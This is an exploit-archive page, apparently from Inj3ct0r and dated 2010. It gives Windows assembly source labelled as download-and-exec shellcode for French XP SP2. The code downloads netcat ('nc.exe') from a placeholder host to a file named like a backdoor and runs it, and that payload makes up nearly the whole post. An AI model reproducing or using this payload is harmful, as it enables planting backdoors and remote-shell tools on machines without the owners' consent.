win32/xp sp2 Fr Download and Exec Shellcode
Posted on 15 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>win32/xp sp2 Fr Download and Exec Shellcode</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================== win32/xp sp2 Fr Download and Exec Shellcode =========================================== Exploit Title winxp sp2 fr download & exec code: ;------------------------------------------- .586 .model flat,stdcall option casemap:none include windows.inc include user32.inc include kernel32.inc include shell32.inc include urlmon.inc includelib user32.lib includelib kernel32.lib includelib shell32.lib includelib urlmon.lib .data URL db "http://www.site.com/nc.exe",0 PATH db "c:ackdor.exe",0 .data? hResult dd ? .code ; --------------------------------------------------------------------------- start: invoke URLDownloadToFile,0,addr URL,addr PATH,0,0 mov hResult,eax .if eax!=1 invoke ShellExecute,0,0,addr PATH,0,0,SW_SHOW .endif end start # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-15]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>